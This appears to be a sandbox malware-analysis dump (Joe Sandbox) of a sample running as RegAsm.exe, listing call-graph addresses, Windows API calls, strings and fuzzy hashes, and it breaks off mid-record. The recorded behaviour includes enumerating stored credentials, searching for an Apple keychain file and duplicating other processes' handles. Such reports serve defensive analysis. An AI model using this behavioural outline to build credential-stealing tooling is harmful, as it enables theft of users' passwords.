40014->40028 40029 43a19e 40014->40029 40015 43a306 40015->40028 40054 4388c4 14 API calls 40015->40054 40018 42a115 146 API calls 40018->40029 40019 415a91 memset 40019->40029 40020 43a642 40020->40028 40058 4169a7 11 API calls 40020->40058 40024 43a635 40057 42c02e memset 40024->40057 40028->40010 40029->40015 40029->40018 40029->40019 40029->40028 40039 42ff8c 40029->40039 40047 4165ff 40029->40047 40050 439504 13 API calls 40029->40050 40051 4312d0 146 API calls 40029->40051 40052 42be4c memcpy memcpy memcpy memset memcpy 40029->40052 40053 43a121 11 API calls 40029->40053 40031 42bf4c 14 API calls 40033 43a325 40031->40033 40032 4169a7 11 API calls 40032->40033 40033->40020 40033->40024 40033->40028 40033->40031 40033->40032 40034 42b5b5 memset memcpy 40033->40034 40037 4165ff 11 API calls 40033->40037 40055 42b63e 14 API calls 40033->40055 40056 42bfcf memcpy 40033->40056 40034->40033 40037->40033 40038->40010 40059 43817e 40039->40059 40041 42ff9d 40041->40029 40042 42ff99 40042->40041 40043 42ffe3 40042->40043 40044 42ffd0 40042->40044 40064 4169a7 11 API calls 40043->40064 40063 4169a7 11 API calls 40044->40063 40213 4165a0 40047->40213 40050->40029 40051->40029 40052->40029 40053->40029 40054->40033 40055->40033 40056->40033 40057->40020 40058->40028 40060 438187 40059->40060 40062 438192 40059->40062 40065 4380f6 40060->40065 40062->40042 40063->40041 40064->40041 40067 43811f 40065->40067 40066 438164 40066->40062 40067->40066 40070 437e5e 40067->40070 40093 4300e8 memset memset memcpy 40067->40093 40094 437d3c 40070->40094 40072 437eb3 40072->40067 40073 437ea9 40073->40072 40078 437f22 40073->40078 40109 41f432 40073->40109 40076 437f06 40156 415c56 11 API calls 40076->40156 40080 437f7f 40078->40080 40081 432d4e 3 API calls 40078->40081 40079 437f95 40157 415c56 11 API calls 40079->40157 40080->40079 40082 43802b 40080->40082 40081->40080 40085 4165ff 11 API calls 40082->40085 40084 437fa3 40084->40072 40160 41f638 103 API calls 40084->40160 40086 438054 40085->40086 40120 437371 40086->40120 40089 43806b 40090 438094 40089->40090 40158 42f50e 137 API calls 40089->40158 40090->40084 40159 4300e8 memset memset memcpy 40090->40159 40093->40067 40095 437d69 40094->40095 40098 437d80 40094->40098 40161 437ccb 11 API calls 40095->40161 40097 437d76 40097->40073 40098->40097 40099 437da3 40098->40099 40100 437d90 40098->40100 40102 438460 133 API calls 40099->40102 40100->40097 40165 437ccb 11 API calls 40100->40165 40105 437dcb 40102->40105 40103 437de8 40164 424f26 122 API calls 40103->40164 40105->40103 40162 444283 13 API calls 40105->40162 40107 437dfc 40163 437ccb 11 API calls 40107->40163 40110 41f44f 40109->40110 40111 41f54d 40109->40111 40112 41f466 40110->40112 40118 41f50b 40110->40118 40166 41f1a5 40110->40166 40191 41c06f memcmp 40110->40191 40192 41f3b1 89 API calls 40110->40192 40193 41f398 85 API calls 40110->40193 40111->40112 40195 41c635 memset memset 40111->40195 40112->40076 40112->40078 40118->40111 40118->40112 40194 41c295 85 API calls 40118->40194 40196 41703f 40120->40196 40122 437399 40123 43739d 40122->40123 40125 4373ac 40122->40125 40203 4446ea 11 API calls 40123->40203 40126 416935 16 API calls 40125->40126 40142 4373ca 40126->40142 40127 437584 40129 4375bc 40127->40129 40210 42453e 122 API calls 40127->40210 40128 438460 133 API calls 40128->40142 40131 415c7d 16 API calls 40129->40131 40132 4375d2 40131->40132 40134 4442e6 11 API calls 40132->40134 40136 4373a7 40132->40136 40133 4251c4 136 API calls 40133->40142 40135 4375e2 40134->40135 40135->40136 40211 444283 13 API calls 40135->40211 40136->40089 40138 415a91 memset 40138->40142 40141 43758f 40209 42453e 122 API calls 40141->40209 40142->40127 40142->40128 40142->40133 40142->40138 40142->40141 40155 437d3c 134 API calls 40142->40155 40204 425433 13 API calls 40142->40204 40205 425413 17 API calls 40142->40205 40206 42533e 16 API calls 40142->40206 40207 42538f 16 API calls 40142->40207 40208 42453e 122 API calls 40142->40208 40145 4375f4 40148 437620 40145->40148 40149 43760b 40145->40149 40147 43759f 40150 416935 16 API calls 40147->40150 40152 416935 16 API calls 40148->40152 40212 444283 13 API calls 40149->40212 40150->40127 40152->40136 40154 437612 memcpy 40154->40136 40155->40142 40156->40072 40157->40084 40158->40090 40159->40084 40160->40072 40161->40097 40162->40107 40163->40103 40164->40097 40165->40097 40167 41bc3b 100 API calls 40166->40167 40168 41f1b4 40167->40168 40169 41edad 85 API calls 40168->40169 40176 41f282 40168->40176 40170 41f1cb 40169->40170 40171 41f1f5 memcmp 40170->40171 40172 41f20e 40170->40172 40170->40176 40171->40172 40173 41f21b memcmp 40172->40173 40172->40176 40174 41f326 40173->40174 40177 41f23d 40173->40177 40175 41ee6b 85 API calls 40174->40175 40174->40176 40175->40176 40176->40110 40177->40174 40178 41f28e memcmp 40177->40178 40180 41c8df 55 API calls 40177->40180 40178->40174 40179 41f2a9 40178->40179 40179->40174 40182 41f308 40179->40182 40183 41f2d8 40179->40183 40181 41f269 40180->40181 40181->40174 40184 41f287 40181->40184 40185 41f27a 40181->40185 40182->40174 40189 4446ce 11 API calls 40182->40189 40186 41ee6b 85 API calls 40183->40186 40184->40178 40187 41ee6b 85 API calls 40185->40187 40188 41f2e0 40186->40188 40187->40176 40190 41b1ca memset 40188->40190 40189->40174 40190->40176 40191->40110 40192->40110 40193->40110 40194->40111 40195->40112 40197 417044 40196->40197 40198 41705c 40196->40198 40200 416760 11 API calls 40197->40200 40202 417055 40197->40202 40199 417075 40198->40199 40201 41707a 11 API calls 40198->40201 40199->40122 40200->40202 40201->40197 40202->40122 40203->40136 40204->40142 40205->40142 40206->40142 40207->40142 40208->40142 40209->40147 40210->40129 40211->40145 40212->40154 40218 415cfe 40213->40218 40223 415d23 __aullrem __aulldvrm 40218->40223 40225 41628e 40218->40225 40219 4163ca 40232 416422 11 API calls 40219->40232 40221 416172 memset 40221->40223 40222 416422 10 API calls 40222->40223 40223->40219 40223->40221 40223->40222 40224 415cb9 10 API calls 40223->40224 40223->40225 40224->40223 40226 416520 40225->40226 40227 416527 40226->40227 40231 416574 40226->40231 40229 416544 40227->40229 40227->40231 40233 4156aa 11 API calls 40227->40233 40230 416561 memcpy 40229->40230 40229->40231 40230->40231 40231->40029 40232->40225 40233->40229 40260 41493c EnumResourceNamesW 37553 4287c1 37554 4287d2 37553->37554 37555 429ac1 37553->37555 37556 428818 37554->37556 37557 42881f 37554->37557 37571 425711 37554->37571 37567 425ad6 37555->37567 37623 415c56 11 API calls 37555->37623 37590 42013a 37556->37590 37618 420244 96 API calls 37557->37618 37562 4260dd 37617 424251 119 API calls 37562->37617 37564 4259da 37616 416760 11 API calls 37564->37616 37568 429a4d 37573 429a66 37568->37573 37574 429a9b 37568->37574 37571->37555 37571->37564 37571->37568 37572 422aeb memset memcpy memcpy 37571->37572 37578 4260a1 37571->37578 37586 4259c2 37571->37586 37589 425a38 37571->37589 37606 4227f0 memset memcpy 37571->37606 37607 422b84 15 API calls 37571->37607 37608 422b5d memset memcpy memcpy 37571->37608 37609 422640 13 API calls 37571->37609 37611 4241fc 11 API calls 37571->37611 37612 42413a 89 API calls 37571->37612 37572->37571 37619 415c56 11 API calls 37573->37619 37577 429a96 37574->37577 37621 416760 11 API calls 37574->37621 37622 424251 119 API calls 37577->37622 37615 415c56 11 API calls 37578->37615 37580 429a7a 37620 416760 11 API calls 37580->37620 37586->37567 37610 415c56 11 API calls 37586->37610 37589->37586 37613 422640 13 API calls 37589->37613 37614 4226e0 12 API calls 37589->37614 37591 42014c 37590->37591 37594 420151 37590->37594 37633 41e466 96 API calls 37591->37633 37593 420162 37593->37571 37594->37593 37595 4201b3 37594->37595 37596 420229 37594->37596 37597 4201b8 37595->37597 37598 4201dc 37595->37598 37596->37593 37599 41fd5e 85 API calls 37596->37599 37624 41fbdb 37597->37624 37598->37593 37603 4201ff 37598->37603 37630 41fc4c 37598->37630 37599->37593 37603->37593 37605 42013a 96 API calls 37603->37605 37605->37593 37606->37571 37607->37571 37608->37571 37609->37571 37610->37564 37611->37571 37612->37571 37613->37589 37614->37589 37615->37564 37616->37562 37617->37567 37618->37571 37619->37580 37620->37577 37621->37577 37622->37555 37623->37564 37625 41fbf1 37624->37625 37626 41fbf8 37624->37626 37629 41fc39 37625->37629 37648 4446ce 11 API calls 37625->37648 37638 41ee26 37626->37638 37629->37593 37634 41fd5e 37629->37634 37631 41ee6b 85 API calls 37630->37631 37632 41fc5d 37631->37632 37632->37598 37633->37594 37637 41fd65 37634->37637 37635 41fdab 37635->37593 37636 41fbdb 85 API calls 37636->37637 37637->37635 37637->37636 37639 41ee41 37638->37639 37640 41ee32 37638->37640 37649 41edad 37639->37649 37652 4446ce 11 API calls 37640->37652 37644 41ee3c 37644->37625 37646 41ee58 37646->37644 37654 41ee6b 37646->37654 37648->37629 37658 41be52 37649->37658 37652->37644 37653 41eb85 11 API calls 37653->37646 37655 41ee70 37654->37655 37656 41ee78 37654->37656 37714 41bf99 85 API calls 37655->37714 37656->37644 37659 41be6f 37658->37659 37660 41be5f 37658->37660 37665 41be8c 37659->37665 37679 418c63 37659->37679 37693 4446ce 11 API calls 37660->37693 37662 41be69 37662->37644 37662->37653 37665->37662 37666 41bf3a 37665->37666 37667 41bed1 37665->37667 37669 41bee7 37665->37669 37696 4446ce 11 API calls 37666->37696 37670 41bef0 37667->37670 37673 41bee2 37667->37673 37669->37662 37697 41a453 85 API calls 37669->37697 37670->37669 37672 41bf01 37670->37672 37671 41bf24 memset 37671->37662 37672->37671 37675 41bf14 37672->37675 37694 418a6d memset memcpy memset 37672->37694 37683 41ac13 37673->37683 37695 41a223 memset memcpy memset 37675->37695 37678 41bf20 37678->37671 37682 418c72 37679->37682 37680 418c94 37680->37665 37681 418d51 memset memset 37681->37680 37682->37680 37682->37681 37684 41ac52 37683->37684 37685 41ac3f memset 37683->37685 37687 41ac6a 37684->37687 37698 41dc14 19 API calls 37684->37698 37690 41acd9 37685->37690 37689 41aca1 37687->37689 37699 41519d 37687->37699 37689->37690 37691 41acc0 memset 37689->37691 37692 41accd memcpy 37689->37692 37690->37669 37691->37690 37692->37690 37693->37662 37694->37675 37695->37678 37696->37669 37698->37687 37702 4175ed 37699->37702 37710 417570 SetFilePointer 37702->37710 37705 41760a ReadFile 37706 417637 37705->37706 37707 417627 GetLastError 37705->37707 37708 4151b3 37706->37708 37709 41763e memset 37706->37709 37707->37708 37708->37689 37709->37708 37711 4175b2 37710->37711 37712 41759c GetLastError 37710->37712 37711->37705 37711->37708 37712->37711 37713 4175a8 GetLastError 37712->37713 37713->37711 37714->37656 37715 417bc5 37716 417c61 37715->37716 37717 417bda 37715->37717 37717->37716 37718 417bf6 UnmapViewOfFile CloseHandle 37717->37718 37720 417c2c 37717->37720 37722 4175b7 37717->37722 37718->37717 37718->37718 37720->37717 37727 41851e 18 API calls 37720->37727 37723 4175d6 FindCloseChangeNotification 37722->37723 37724 4175c8 37723->37724 37725 4175df 37723->37725 37724->37725 37726 4175ce Sleep 37724->37726 37725->37717 37726->37723 37727->37720 39718 4147f3 39721 414561 39718->39721 39720 414813 39722 41456d 39721->39722 39723 41457f GetPrivateProfileIntW 39721->39723 39726 4143f1 memset _itow WritePrivateProfileStringW 39722->39726 39723->39720 39725 41457a 39725->39720 39726->39725

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 354->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 375 40dffd-40e006 372->375 376 40df08 373->376 377 40dfef-40dff2 CloseHandle 373->377 374->370 374->375 375->362 375->363 378 40df0b-40df10 376->378 377->372 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                      APIs
                      • memset.MSVCRT ref: 0040DDAD
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                      • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                      • _wcsicmp.MSVCRT ref: 0040DEB2
                      • _wcsicmp.MSVCRT ref: 0040DEC5
                      • _wcsicmp.MSVCRT ref: 0040DED8
                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                      • memset.MSVCRT ref: 0040DF5F
                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                      • _wcsicmp.MSVCRT ref: 0040DFB2
                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                      • API String ID: 594330280-3398334509
                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                      APIs
                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                        • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                      • String ID:
                      • API String ID: 2947809556-0
                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                      APIs
                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: FileFind$FirstNext
                      • String ID:
                      • API String ID: 1690352074-0
                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                      APIs
                      • memset.MSVCRT ref: 0041898C
                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: InfoSystemmemset
                      • String ID:
                      • API String ID: 3558857096-0
                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 6 4455a8-4455e3 memset call 403988 wcsrchr 3->6 7 4457fb 3->7 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 15 4455e5 6->15 16 4455e8-4455f9 6->16 10 445800-445809 7->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 43 445823-445826 14->43 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 51 445879-44587c 18->51 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 79 445685 21->79 80 4456b2-4456b5 call 40b1ab 21->80 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 141 44592d-445945 call 40b6ef 24->141 142 44594a 24->142 45 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->45 46 445b29-445b32 28->46 146 4459d0-4459e8 call 40b6ef 29->146 147 4459ed 29->147 30->21 39 445609-44560d 30->39 31->30 39->21 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 39->49 40->3 41->40 52 44584c-445854 call 40b1ab 43->52 53 445828 43->53 184 445b08-445b15 call 40ae51 45->184 54 445c7c-445c85 46->54 55 445b38-445b96 memset * 3 46->55 157 445665-445670 call 40b1ab 49->157 158 445643-445663 call 40a9b5 call 4087b3 49->158 67 4458a2-4458aa call 40b1ab 51->67 68 44587e 51->68 52->13 69 44582e-445847 call 40a9b5 call 4087b3 53->69 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 70 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->70 71 445b98-445ba0 55->71 84 445fae-445fb2 63->84 85 445d2b-445d3b 63->85 163 445cf5 64->163 164 445cfc-445d03 64->164 67->19 77 445884-44589d call 40a9b5 call 4087b3 68->77 144 445849 69->144 247 445c77 70->247 71->70 78 445ba2-445bcf call 4099c6 call 445403 call 445389 71->78 149 44589f 77->149 78->54 94 44568b-4456a4 call 40a9b5 call 4087b3 79->94 111 4456ba-4456c4 80->111 99 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 85->99 100 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 85->100 151 4456a9-4456b0 94->151 169 445d67-445d6c 99->169 170 445d71-445d83 call 445093 99->170 194 445e17 100->194 195 445e1e-445e25 100->195 124 4457f9 111->124 125 4456ca-4456d3 call 413cfa call 413d4c 111->125 124->7 177 4456d8-4456f7 call 40b2cc call 413fa6 125->177 141->142 142->23 144->52 146->147 147->28 149->67 151->80 151->94 157->111 158->157 163->164 174 445d05-445d13 164->174 175 445d17 164->175 179 445fa1-445fa9 call 40b6ef 169->179 170->84 174->175 175->63 208 4456fd-445796 memset * 4 call 409c70 * 3 177->208 209 4457ea-4457f7 call 413d29 177->209 179->84 198 445b17-445b27 call 40aebe 184->198 199 445aa3-445ab0 call 40add4 184->199 194->195 200 445e27-445e59 call 40b2cc call 409d1f call 409b98 195->200 201 445e6b-445e7e call 445093 195->201 198->46 199->184 223 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 199->223 242 445e62-445e69 200->242 243 445e5b 200->243 222 445f67-445f99 call 40b2cc call 409d1f call 409b98 201->222 208->209 246 445798-4457ca call 40b2cc call 409d1f call 409b98 208->246 209->10 222->84 254 445f9b 222->254 223->184 242->201 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->209 264 4457cc-4457e5 call 4087b3 246->264 247->54 265 445f4d-445f5a call 40ae51 248->265 254->179 264->209 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->222 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                      APIs
                      • memset.MSVCRT ref: 004455C2
                      • wcsrchr.MSVCRT ref: 004455DA
                      • memset.MSVCRT ref: 0044570D
                      • memset.MSVCRT ref: 00445725
                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                        • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                        • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                      • memset.MSVCRT ref: 0044573D
                      • memset.MSVCRT ref: 00445755
                      • memset.MSVCRT ref: 004458CB
                      • memset.MSVCRT ref: 004458E3
                      • memset.MSVCRT ref: 0044596E
                      • memset.MSVCRT ref: 00445A10
                      • memset.MSVCRT ref: 00445A28
                      • memset.MSVCRT ref: 00445AC6
                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                      • memset.MSVCRT ref: 00445B52
                      • memset.MSVCRT ref: 00445B6A
                      • memset.MSVCRT ref: 00445C9B
                      • memset.MSVCRT ref: 00445CB3
                      • _wcsicmp.MSVCRT ref: 00445D56
                      • memset.MSVCRT ref: 00445B82
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                      • memset.MSVCRT ref: 00445986
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                      • API String ID: 2745753283-3798722523
                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                      • String ID: $/deleteregkey$/savelangfile
                      • API String ID: 2744995895-28296030
                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
